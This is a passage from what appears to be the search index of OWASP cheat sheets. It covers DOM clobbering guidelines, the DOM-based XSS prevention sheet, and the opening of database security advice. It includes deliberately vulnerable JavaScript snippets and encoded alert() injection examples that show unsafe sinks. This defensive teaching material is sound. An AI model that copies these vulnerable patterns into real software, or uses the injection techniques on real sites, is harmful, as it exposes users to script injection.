Note: Freezing object properties prevents them from being overwritten by named DOM elements. But, determining all objects and object properties that need to be frozen may be not be easy, limiting the usefulness of this approach.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#secure-coding-guidelines","title":"Secure Coding Guidelines","text":"

DOM Clobbering can be avoided by defensive programming and adhering to a few coding patterns and guidelines.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#4-validate-all-inputs-to-dom-tree","title":"#4: Validate All Inputs to DOM Tree","text":"

Before inserting any markup into the webpage's DOM tree, sanitize id and name attributes (see HTML sanitization).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#5-use-explicit-variable-declarations","title":"#5: Use Explicit Variable Declarations","text":"

When initializing varibles, always use a variable declarator like var, let or const, which prevents clobbering of the variable.

Note: Declaring a variable with let does not create a property on window, unlike var. Therefore, window.VARNAME can still be clobbered (assuming VARNAME is the name of the variable).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#6-do-not-use-document-and-window-for-global-variables","title":"#6: Do Not Use Document and Window for Global Variables","text":"

Avoid using objects like document and window for storing global variables, because they can be easily manipulated. (see, e.g., here).

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#7-do-not-trust-document-built-in-apis-before-validation","title":"#7: Do Not Trust Document Built-in APIs Before Validation","text":"

Document properties, including built-in ones, are always overshadowed by DOM Clobbering, even right after they are assigned a value.

Hint: This is due to the so-called named property visibility algorithm, where named HTML element references come before lookups of built-in APIs and other attributes on document.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#8-enforce-type-checking","title":"#8: Enforce Type Checking","text":"

Always check the type of Document and Window properties before using them in sensitive operations, e.g., using the instance of operator.

Hint: When an object is clobbered, it would refer to an HTMLElement instance, which may not be the expected type.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#9-use-strict-mode","title":"#9: Use Strict Mode","text":"

Use strict mode to prevent unintended global variable creation, and to raise an error when read-only properties are attempted to be over-written.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#10-apply-browser-feature-detection","title":"#10: Apply Browser Feature Detection","text":"

Instead of relying on browser-specific features or properties, use feature detection to determine whether a feature is supported before using it. This can help prevent errors and DOM Clobberng that might arise when using those features in unsupported browsers.

Hint: Unsupported feature APIs can act as an undefined variable/property in unsupported browsers, making them clobberable.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#11-limit-variables-to-local-scope","title":"#11: Limit Variables to Local Scope","text":"

Global variables are more prone to being overwritten by DOM Clobberng. Whenever possible, use local variables and object properties.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#12-use-unique-variable-names-in-production","title":"#12: Use Unique Variable Names In Production","text":"

Using unique variable names may help prevent naming collisions that could lead to accidental overwrites.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#13-use-object-oriented-programming-techniques-like-encapsulation","title":"#13: Use Object-oriented Programming Techniques like Encapsulation","text":"

Encapsulating variables and functions within objects or classes can help prevent them from being overwritten. By making them private, they cannot be accessed from outside the object, making them less prone to DOM Clobbering.

"},{"location":"cheatsheets/DOM_Clobbering_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html","title":"DOM based XSS Prevention Cheat Sheet","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

When looking at XSS (Cross-Site Scripting), there are three generally recognized forms of XSS:

The XSS Prevention Cheatsheet does an excellent job of addressing Reflected and Stored XSS. This cheatsheet addresses DOM (Document Object Model) based XSS and is an extension (and assumes comprehension of) the XSS Prevention Cheatsheet.

In order to understand DOM based XSS, one needs to see the fundamental difference between Reflected and Stored XSS when compared to DOM based XSS. The primary difference is where the attack is injected into the application.

Reflected and Stored XSS are server side injection issues while DOM based XSS is a client (browser) side injection issue.

All of this code originates on the server, which means it is the application owner's responsibility to make it safe from XSS, regardless of the type of XSS flaw it is. Also, XSS attacks always execute in the browser.

The difference between Reflected/Stored XSS is where the attack is added or injected into the application. With Reflected/Stored the attack is injected into the application during server-side processing of requests where untrusted input is dynamically added to HTML. For DOM XSS, the attack is injected into the application during runtime in the client directly.

When a browser is rendering HTML and any other associated content like CSS or JavaScript, it identifies various rendering contexts for the different kinds of input and follows different rules for each context. A rendering context is associated with the parsing of HTML tags and their attributes.

For the purposes of this article, we refer to the HTML, HTML attribute, URL, and CSS contexts as subcontexts because each of these contexts can be reached and set within a JavaScript execution context.

In JavaScript code, the main context is JavaScript but with the right tags and context closing characters, an attacker can try to attack the other 4 contexts using equivalent JavaScript DOM methods.

The following is an example vulnerability which occurs in the JavaScript context and HTML subcontext:

 <script>\nvar x = '<%= taintedVar %>';\nvar d = document.createElement('div');\nd.innerHTML = x;\ndocument.body.appendChild(d);\n</script>\n

Let's look at the individual subcontexts of the execution context in turn.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-1-html-escape-then-javascript-escape-before-inserting-untrusted-data-into-html-subcontext-within-the-execution-context","title":"RULE #1 - HTML Escape then JavaScript Escape Before Inserting Untrusted Data into HTML Subcontext within the Execution Context","text":"

There are several methods and attributes which can be used to directly render HTML content within JavaScript. These methods constitute the HTML Subcontext within the Execution Context. If these methods are provided with untrusted input, then an XSS vulnerability could result. For example:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#example-dangerous-html-methods","title":"Example Dangerous HTML Methods","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#attributes","title":"Attributes","text":"
 element.innerHTML = \"<HTML> Tags and markup\";\nelement.outerHTML = \"<HTML> Tags and markup\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#methods","title":"Methods","text":"
 document.write(\"<HTML> Tags and markup\");\ndocument.writeln(\"<HTML> Tags and markup\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline","title":"Guideline","text":"

To make dynamic updates to HTML in the DOM safe, we recommend:

  1. HTML encoding, and then
  2. JavaScript encoding all untrusted input, as shown in these examples:
 var ESAPI = require('node-esapi');\nelement.innerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\nelement.outerHTML = \"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\";\n
 var ESAPI = require('node-esapi');\ndocument.write(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\ndocument.writeln(\"<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTML(untrustedData))%>\");\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-2-javascript-escape-before-inserting-untrusted-data-into-html-attribute-subcontext-within-the-execution-context","title":"RULE #2 - JavaScript Escape Before Inserting Untrusted Data into HTML Attribute Subcontext within the Execution Context","text":"

The HTML attribute subcontext within the execution context is divergent from the standard encoding rules. This is because the rule to HTML attribute encode in an HTML attribute rendering context is necessary in order to mitigate attacks which try to exit out of an HTML attributes or try to add additional attributes which could lead to XSS.

When you are in a DOM execution context you only need to JavaScript encode HTML attributes which do not execute code (attributes other than event handler, CSS, and URL attributes).

For example, the general rule is to HTML Attribute encode untrusted data (data from the database, HTTP request, user, back-end system, etc.) placed in an HTML Attribute. This is the appropriate step to take when outputting data in a rendering context, however using HTML Attribute encoding in an execution context will break the application display of data.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-but-broken-example","title":"SAFE but BROKEN example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\n// In the following line of code, companyName represents untrusted user input\n// The ESAPI.encoder().encodeForHTMLAttribute() is unnecessary and causes double-encoding\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForHTMLAttribute(companyName))%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

The problem is that if companyName had the value \"Johnson & Johnson\". What would be displayed in the input text field would be \"Johnson &amp; Johnson\". The appropriate encoding to use in the above case would be only JavaScript encoding to disallow an attacker from closing out the single quotes and in-lining code, or escaping to HTML and opening a new script tag.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#safe-and-functionally-correct-example","title":"SAFE and FUNCTIONALLY CORRECT example","text":"
 var ESAPI = require('node-esapi');\nvar x = document.createElement(\"input\");\nx.setAttribute(\"name\", \"company_name\");\nx.setAttribute(\"value\", '<%=ESAPI.encoder().encodeForJavascript(companyName)%>');\nvar form1 = document.forms[0];\nform1.appendChild(x);\n

It is important to note that when setting an HTML attribute which does not execute code, the value is set directly within the object attribute of the HTML element so there is no concerns with injecting up.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-3-be-careful-when-inserting-untrusted-data-into-the-event-handler-and-javascript-code-subcontexts-within-an-execution-context","title":"RULE #3 - Be Careful when Inserting Untrusted Data into the Event Handler and JavaScript code Subcontexts within an Execution Context","text":"

Putting dynamic data within JavaScript code is especially dangerous because JavaScript encoding has different semantics for JavaScript encoded data when compared to other encodings. In many cases, JavaScript encoding does not stop attacks within an execution context. For example, a JavaScript encoded string will execute even though it is JavaScript encoded.

Therefore, the primary recommendation is to avoid including untrusted data in this context. If you must, the following examples describe some approaches that do and do not work.

var x = document.createElement(\"a\");\nx.href=\"#\";\n// In the line of code below, the encoded data on the right (the second argument to setAttribute)\n// is an example of untrusted data that was properly JavaScript encoded but still executes.\nx.setAttribute(\"onclick\", \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0032\\u0032\\u0029\");\nvar y = document.createTextNode(\"Click To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

The setAttribute(name_string,value_string) method is dangerous because it implicitly coerces the value_string into the DOM attribute datatype of name_string.

In the case above, the attribute name is an JavaScript event handler, so the attribute value is implicitly converted to JavaScript code and evaluated. In the case above, JavaScript encoding does not mitigate against DOM based XSS.

Other JavaScript methods which take code as a string types will have a similar problem as outline above (setTimeout, setInterval, new Function, etc.). This is in stark contrast to JavaScript encoding in the event handler attribute of a HTML tag (HTML parser) where JavaScript encoding mitigates against XSS.

<!-- Does NOT work  -->\n<a id=\"bb\" href=\"#\" onclick=\"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0029\"> Test Me</a>\n

An alternative to using Element.setAttribute(...) to set DOM attributes is to set the attribute directly. Directly setting event handler attributes will allow JavaScript encoding to mitigate against DOM based XSS. Please note, it is always dangerous design to put untrusted data directly into a command execution context.

<a id=\"bb\" href=\"#\"> Test Me</a>\n
//The following does NOT work because the event handler is being set to a string.\n//\"alert(7)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onclick = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0029\";\n\n//The following does NOT work because the event handler is being set to a string.\ndocument.getElementById(\"bb\").onmouseover = \"testIt\";\n\n//The following does NOT work because of the encoded \"(\" and \")\".\n//\"alert(77)\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0037\\u0037\\u0029;\n\n//The following does NOT work because of the encoded \";\".\n//\"testIt;testIt\" is JavaScript encoded.\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074\\u003b\\u0074\\u0065\\u0073\n\\u0074\\u0049\\u0074;\n\n//The following DOES WORK because the encoded value is a valid variable name or function reference.\n//\"testIt\" is JavaScript encoded\ndocument.getElementById(\"bb\").onmouseover = \\u0074\\u0065\\u0073\\u0074\\u0049\\u0074;\n\nfunction testIt() {\nalert(\"I was called.\");\n}\n

There are other places in JavaScript where JavaScript encoding is accepted as valid executable code.

 for(var \\u0062=0; \\u0062 < 10; \\u0062++){\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065\\u006c\\u006e\n(\"\\u0048\\u0065\\u006c\\u006c\\u006f\\u0020\\u0057\\u006f\\u0072\\u006c\\u0064\");\n}\n\\u0077\\u0069\\u006e\\u0064\\u006f\\u0077\n.\\u0065\\u0076\\u0061\\u006c\n\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074\n.\\u0077\\u0072\\u0069\\u0074\\u0065(111111111);\n

or

 var s = \"\\u0065\\u0076\\u0061\\u006c\";\nvar t = \"\\u0061\\u006c\\u0065\\u0072\\u0074\\u0028\\u0031\\u0031\\u0029\";\nwindow[s](t);\n

Because JavaScript is based on an international standard (ECMAScript), JavaScript encoding enables the support of international characters in programming constructs and variables in addition to alternate string representations (string escapes).

However the opposite is the case with HTML encoding. HTML tag elements are well defined and do not support alternate representations of the same tag. So HTML encoding cannot be used to allow the developer to have alternate representations of the <a> tag for example.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#html-encodings-disarming-nature","title":"HTML Encoding's Disarming Nature","text":"

In general, HTML encoding serves to castrate HTML tags which are placed in HTML and HTML attribute contexts. Working example (no HTML encoding):

<a href=\"...\" >\n

Normally encoded example (Does Not Work \u2013 DNW):

&#x3c;a href=... &#x3e;\n

HTML encoded example to highlight a fundamental difference with JavaScript encoded values (DNW):

<&#x61; href=...>\n

If HTML encoding followed the same semantics as JavaScript encoding. The line above could have possibly worked to render a link. This difference makes JavaScript encoding a less viable weapon in our fight against XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-4-javascript-escape-before-inserting-untrusted-data-into-the-css-attribute-subcontext-within-the-execution-context","title":"RULE #4 - JavaScript Escape Before Inserting Untrusted Data into the CSS Attribute Subcontext within the Execution Context","text":"

Normally executing JavaScript from a CSS context required either passing javascript:attackCode() to the CSS url() method or invoking the CSS expression() method passing JavaScript code to be directly executed.

From my experience, calling the expression() function from an execution context (JavaScript) has been disabled. In order to mitigate against the CSS url() method, ensure that you are URL encoding the data passed to the CSS url() method.

var ESAPI = require('node-esapi');\ndocument.body.style.backgroundImage = \"url(<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(companyName))%>)\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-5-url-escape-then-javascript-escape-before-inserting-untrusted-data-into-url-attribute-subcontext-within-the-execution-context","title":"RULE #5 - URL Escape then JavaScript Escape Before Inserting Untrusted Data into URL Attribute Subcontext within the Execution Context","text":"

The logic which parses URLs in both execution and rendering contexts looks to be the same. Therefore there is little change in the encoding rules for URL attributes in an execution (DOM) context.

var ESAPI = require('node-esapi');\nvar x = document.createElement(\"a\");\nx.setAttribute(\"href\", '<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(userRelativePath))%>');\nvar y = document.createTextElement(\"Click Me To Test\");\nx.appendChild(y);\ndocument.body.appendChild(x);\n

If you utilize fully qualified URLs then this will break the links as the colon in the protocol identifier (http: or javascript:) will be URL encoded preventing the http and javascript protocols from being invoked.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-6-populate-the-dom-using-safe-javascript-functions-or-properties","title":"RULE #6 - Populate the DOM using safe JavaScript functions or properties","text":"

The most fundamental safe way to populate the DOM with untrusted data is to use the safe assignment property textContent.

Here is an example of safe usage.

<script>\nelement.textContent = untrustedData;  //does not execute code\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#rule-7-fixing-dom-cross-site-scripting-vulnerabilities","title":"RULE #7 - Fixing DOM Cross-site Scripting Vulnerabilities","text":"

The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example if you want to use user input to write in a div tag element don't use innerHtml, instead use innerText or textContent. This will solve the problem, and it is the right way to re-mediate DOM based XSS vulnerabilities.

It is always a bad idea to use a user-controlled input in dangerous sources such as eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input.

Finally, to fix the problem in our initial code, instead of trying to encode the output correctly which is a hassle and can easily go wrong we would simply use element.textContent to write it in a content like this:

<b>Current URL:</b> <span id=\"contentholder\"></span>\n...\n<script>\ndocument.getElementById(\"contentholder\").textContent = document.baseURI;\n</script>\n

It does the same thing but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guidelines-for-developing-secure-applications-utilizing-javascript","title":"Guidelines for Developing Secure Applications Utilizing JavaScript","text":"

DOM based XSS is extremely difficult to mitigate against because of its large attack surface and lack of standardization across browsers.

The guidelines below are an attempt to provide guidelines for developers when developing Web based JavaScript applications (Web 2.0) such that they can avoid XSS.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-1-untrusted-data-should-only-be-treated-as-displayable-text","title":"GUIDELINE #1 - Untrusted data should only be treated as displayable text","text":"

Avoid treating untrusted data as code or markup within JavaScript code.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-2-always-javascript-encode-and-delimit-untrusted-data-as-quoted-strings-when-entering-the-application-when-building-templated-javascript","title":"GUIDELINE #2 - Always JavaScript encode and delimit untrusted data as quoted strings when entering the application when building templated JavaScript","text":"

Always JavaScript encode and delimit untrusted data as quoted strings when entering the application as illustrated in the following example.

var x = \"<%= Encode.forJavaScript(untrustedData) %>\";\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-3-use-documentcreateelement-elementsetattributevalue-elementappendchild-and-similar-to-build-dynamic-interfaces","title":"GUIDELINE #3 - Use document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar to build dynamic interfaces","text":"

document.createElement(\"...\"), element.setAttribute(\"...\",\"value\"), element.appendChild(...) and similar are safe ways to build dynamic interfaces.

Please note, element.setAttribute is only safe for a limited number of attributes.

Dangerous attributes include any attribute that is a command execution context, such as onclick or onblur.

Examples of safe attributes includes: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-4-avoid-sending-untrusted-data-into-html-rendering-methods","title":"GUIDELINE #4 - Avoid sending untrusted data into HTML rendering methods","text":"

Avoid populating the following methods with untrusted data.

  1. element.innerHTML = \"...\";
  2. element.outerHTML = \"...\";
  3. document.write(...);
  4. document.writeln(...);
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-5-avoid-the-numerous-methods-which-implicitly-eval-data-passed-to-it","title":"GUIDELINE #5 - Avoid the numerous methods which implicitly eval() data passed to it","text":"

There are numerous methods which implicitly eval() data passed to it that must be avoided.

Make sure that any untrusted data passed to these methods is:

  1. Delimited with string delimiters
  2. Enclosed within a closure or JavaScript encoded to N-levels based on usage
  3. Wrapped in a custom function.

Ensure to follow step 3 above to make sure that the untrusted data is not sent to dangerous methods within the custom function or handle it by adding an extra layer of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#utilizing-an-enclosure-as-suggested-by-gaz","title":"Utilizing an Enclosure (as suggested by Gaz)","text":"

The example that follows illustrates using closures to avoid double JavaScript encoding.

 var ESAPI = require('node-esapi');\nsetTimeout((function(param) { return function() {\ncustomFunction(param);\n}\n})(\"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\"), y);\n

The other alternative is using N-levels of encoding.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#n-levels-of-encoding","title":"N-Levels of Encoding","text":"

If your code looked like the following, you would need to only double JavaScript encode input data.

setTimeout(\"customFunction('<%=doubleJavaScriptEncodedData%>', y)\");\nfunction customFunction (firstName, lastName)\nalert(\"Hello\" + firstName + \" \" + lastNam);\n}\n

The doubleJavaScriptEncodedData has its first layer of JavaScript encoding reversed (upon execution) in the single quotes.

Then the implicit eval of setTimeout reverses another layer of JavaScript encoding to pass the correct value to customFunction

The reason why you only need to double JavaScript encode is that the customFunction function did not itself pass the input to another method which implicitly or explicitly called eval If firstName was passed to another JavaScript method which implicitly or explicitly called eval() then <%=doubleJavaScriptEncodedData%> above would need to be changed to <%=tripleJavaScriptEncodedData%>.

An important implementation note is that if the JavaScript code tries to utilize the double or triple encoded data in string comparisons, the value may be interpreted as different values based on the number of evals() the data has passed through before being passed to the if comparison and the number of times the value was JavaScript encoded.

If A is double JavaScript encoded then the following if check will return false.

 var x = \"doubleJavaScriptEncodedA\";  //\\u005c\\u0075\\u0030\\u0030\\u0034\\u0031\nif (x == \"A\") {\nalert(\"x is A\");\n} else if (x == \"\\u0041\") {\nalert(\"This is what pops\");\n}\n

This brings up an interesting design point. Ideally, the correct way to apply encoding and avoid the problem stated above is to server-side encode for the output context where data is introduced into the application.

Then client-side encode (using a JavaScript encoding library such as node-esapi) for the individual subcontext (DOM methods) which untrusted data is passed to.

Here are some examples of how they are used:

//server-side encoding\nvar ESAPI = require('node-esapi');\nvar input = \"<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>\";\n
//HTML encoding is happening in JavaScript\nvar ESAPI = require('node-esapi');\ndocument.writeln(ESAPI.encoder().encodeForHTML(input));\n

One option is utilize ECMAScript 5 immutable properties in the JavaScript library. Another option provided by Gaz (Gareth) was to use a specific code construct to limit mutability with anonymous closures.

An example follows:

function escapeHTML(str) {\nstr = str + \"''\";\nvar out = \"''\";\nfor(var i=0; i<str.length; i++) {\nif(str[i] === '<') {\nout += '&lt;';\n} else if(str[i] === '>') {\nout += '&gt;';\n} else if(str[i] === \"'\") {\nout += '&#39;';\n} else if(str[i] === '\"') {\nout += '&quot;';\n} else {\nout += str[i];\n}\n}\nreturn out;\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-6-use-untrusted-data-on-only-the-right-side-of-an-expression","title":"GUIDELINE #6 - Use untrusted data on only the right side of an expression","text":"

Use untrusted data on only the right side of an expression, especially data that looks like code and may be passed to the application (e.g., location and eval()).

window[userDataOnLeftSide] = \"userDataOnRightSide\";\n

Using untrusted user data on the left side of the expression allows an attacker to subvert internal and external attributes of the window object, whereas using user input on the right side of the expression doesn't allow direct manipulation.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-7-when-url-encoding-in-dom-be-aware-of-character-set-issues","title":"GUIDELINE #7 - When URL encoding in DOM be aware of character set issues","text":"

When URL encoding in DOM be aware of character set issues as the character set in JavaScript DOM is not clearly defined (Mike Samuel).

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-8-limit-access-to-object-properties-when-using-objectx-accessors","title":"GUIDELINE #8 - Limit access to object properties when using object[x] accessors","text":"

Limit access to object properties when using object[x] accessors (Mike Samuel). In other words, add a level of indirection between untrusted input and specified object properties.

Here is an example of the problem using map types:

var myMapType = {};\nmyMapType[<%=untrustedData%>] = \"moreUntrustedData\";\n

The developer writing the code above was trying to add additional keyed elements to the myMapType object. However, this could be used by an attacker to subvert internal and external attributes of the myMapType object.

A better approach would be to use the following:

if (untrustedData === 'location') {\nmyMapType.location = \"moreUntrustedData\";\n}\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-9-run-your-javascript-in-a-ecmascript-5-canopy-or-sandbox","title":"GUIDELINE #9 - Run your JavaScript in a ECMAScript 5 canopy or sandbox","text":"

Run your JavaScript in a ECMAScript 5 canopy or sandbox to make it harder for your JavaScript API to be compromised (Gareth Heyes and John Stevens).

Examples of some JavaScript sandbox / sanitizers:

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#guideline-10-dont-eval-json-to-convert-it-to-native-javascript-objects","title":"GUIDELINE #10 - Don't eval() JSON to convert it to native JavaScript objects","text":"

Don't eval() JSON to convert it to native JavaScript objects. Instead use JSON.toJSON() and JSON.parse() (Chris Schmidt).

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#common-problems-associated-with-mitigating-dom-based-xss","title":"Common Problems Associated with Mitigating DOM Based XSS","text":""},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#complex-contexts","title":"Complex Contexts","text":"

In many cases the context isn't always straightforward to discern.

<a href=\"javascript:myFunction('<%=untrustedData%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nwindow.location = url;\n}\n</script>\n

In the above example, untrusted data started in the rendering URL context (href attribute of an a tag) then changed to a JavaScript execution context (javascript: protocol handler) which passed the untrusted data to an execution URL subcontext (window.location of myFunction).

Because the data was introduced in JavaScript code and passed to a URL subcontext the appropriate server-side encoding would be the following:

<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(ESAPI.encoder().encodeForURL(untrustedData)) %>', 'test');\">\nClick Me</a>\n ...\n

Or if you were using ECMAScript 5 with an immutable JavaScript client-side encoding libraries you could do the following:

<!-- server side URL encoding has been removed.  Now only JavaScript encoding on server side. -->\n<a href=\"javascript:myFunction('<%=ESAPI.encoder().encodeForJavascript(untrustedData)%>', 'test');\">Click Me</a>\n ...\n<script>\nFunction myFunction (url,name) {\nvar encodedURL = ESAPI.encoder().encodeForURL(url);  //URL encoding using client-side scripts\nwindow.location = encodedURL;\n}\n</script>\n
"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#inconsistencies-of-encoding-libraries","title":"Inconsistencies of Encoding Libraries","text":"

There are a number of open source encoding libraries out there:

  1. OWASP ESAPI
  2. OWASP Java Encoder
  3. Apache Commons Text StringEscapeUtils, replace one from Apache Commons Lang3
  4. Jtidy
  5. Your company's custom implementation.

Some work on a block list while others ignore important characters like \"<\" and \">\".

Java Encoder is an active project providing supports for HTML, CSS and JavaScript encoding.

ESAPI is one of the few which works on an allow list and encodes all non-alphanumeric characters. It is important to use an encoding library that understands which characters can be used to exploit vulnerabilities in their respective contexts. Misconceptions abound related to the proper encoding that is required.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#encoding-misconceptions","title":"Encoding Misconceptions","text":"

Many security training curriculums and papers advocate the blind usage of HTML encoding to resolve XSS.

This logically seems to be prudent advice as the JavaScript parser does not understand HTML encoding.

However, if the pages returned from your web application utilize a content type of text/xhtml or the file type extension of *.xhtml then HTML encoding may not work to mitigate against XSS.

For example:

<script>\n&#x61;lert(1);\n</script>\n

The HTML encoded value above is still executable. If that isn't enough to keep in mind, you have to remember that encodings are lost when you retrieve them using the value attribute of a DOM element.

Let's look at the sample page and script:

<form name=\"myForm\" ...>\n  <input type=\"text\" name=\"lName\" value=\"<%=ESAPI.encoder().encodeForHTML(last_name)%>\">\n ...\n</form>\n<script>\nvar x = document.myForm.lName.value;  //when the value is retrieved the encoding is reversed\ndocument.writeln(x);  //any code passed into lName is now executable.\n</script>\n

Finally there is the problem that certain methods in JavaScript which are usually safe can be unsafe in certain contexts.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#usually-safe-methods","title":"Usually Safe Methods","text":"

One example of an attribute which is thought to be safe is innerText.

Some papers or guides advocate its use as an alternative to innerHTML to mitigate against XSS in innerHTML. However, depending on the tag which innerText is applied, code can be executed.

<script>\nvar tag = document.createElement(\"script\");\ntag.innerText = \"<%=untrustedData%>\";  //executes code\n</script>\n

The innerText feature was originally introduced by Internet Explorer, and was formally specified in the HTML standard in 2016 after being adopted by all major browser vendors.

"},{"location":"cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html#detect-dom-xss-using-variant-analysis","title":"Detect DOM XSS using variant analysis","text":"

Vulnerable code:

<script>\nvar x = location.hash.split(\"#\")[1];\ndocument.write(x);\n</script>\n

Semgrep rule to identify above dom xss link.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html","title":"Database Security Cheat Sheet","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance on securely configuring and using the SQL and NoSQL databases. It is intended to be used by application developers when they are responsible for managing the databases, in the absence of a dedicated database administrator (DBA). For details about protecting against SQL Injection attacks, see the SQL Injection Prevention Cheat Sheet.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#connecting-to-the-database","title":"Connecting to the Database","text":"

The backend database used by the application should be isolated as much as possible, in order to prevent malicious or undesirable users from being able to connect to it. Exactly how this is achieved will depend on the system and network architecture. The following options could be used to protect it:

Similar protection should be implemented to protect any web-based management tools used with the database, such as phpMyAdmin.

When an application is running on an untrusted system (such as a thick-client), it should always connect to the backend through an API that can enforce appropriate access control and restrictions. Direct connections should never be made from a thick client to the backend database.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#transport-layer-protection","title":"Transport Layer Protection","text":"

Most databases will allow unencrypted network connections in their default configurations. Although some will encrypt the initial authentication (such as Microsoft SQL Server), the rest of the traffic will be unencrypted, meaning that all kinds of sensitive information will be sent across the network in clear text. The following steps should be taken to prevent unencrypted traffic:

The Transport Layer Protection and TLS Cipher String Cheat Sheets contain further guidance on securely configuring TLS.

